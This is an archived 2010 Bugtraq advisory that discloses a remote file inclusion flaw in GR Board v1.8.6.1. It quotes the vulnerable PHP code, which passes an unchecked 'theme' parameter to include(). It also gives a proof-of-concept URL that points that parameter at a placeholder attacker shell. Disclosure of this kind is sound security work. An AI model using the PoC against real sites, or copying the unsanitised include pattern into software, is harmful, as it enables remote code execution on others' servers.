lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201005300534.o4U5YwkU025772@www3.securityfocus.com>
Date: Sat, 29 May 2010 23:34:58 -0600
From: g1xsystem@...dowslive.com
To: bugtraq@...urityfocus.com
Subject: GR Board v1.8.6.1 stab (page.php?theme) Remote File Inclusion
 Vulnerability

========================================================
GR Board v1.8.6.1 stab (page.php?theme) Remote File Inclusion Vulnerability
========================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ########################################          1
0                    I'm eidelweiss member from Inj3ct0r Team          1
1                    ########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

download:	http://sirini.net/grboard/board.php?id=grskin&articleNo=82
Author:		eidelweiss
Contact:	g1xsystem[at]windowslive.com

=====================================================================

Description:

GRBoard (VERSION 1.8 )is bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But I find Remote File Inclusion vulnerability.

=====================================================================

	--=[ Vuln C0de ]=-

[-] path/page.php

-----------------------------------------------------------------------------------------

// &#54168;&#51060;&#51648;&#50640;&#49436; &#49324;&#50857;&#54624; &#48320;&#49688; &#48512;&#47476;&#44592;
$getConfigList = array('theme', 'title', 'logo', 'useOutlogin', 'outlogin', 'usePoll', 'poll');
$countList = count($getConfigList);
for($i=0; $i<$countList; $i++) $config[$getConfigList[$i]] = getVar($getConfigList[$i]);
$content = @mysql_fetch_array(mysql_query('select var from '.$dbFIX.'layout_config where opt = \'page\' and var like \''.$_GET['id'].'|%\''));
$content = str_replace($_GET['id'].'|', '', $content['var']);
$path = 'layout/'.$config['theme'];
include 'layout/'.$config['theme'].'/head.page.php';	// <= 1
?>
<div id="mainFrame"><?php echo $content; ?></div>

<div class="clear"></div>
<?php
include 'layout/'.$config['theme'].'/foot.page.php';	// <= 2


?>

-----------------------------------------------------------------------------------------

	-=[ P0C ]=-

	http://127.0.0.1/path/page.php?theme= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=========================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ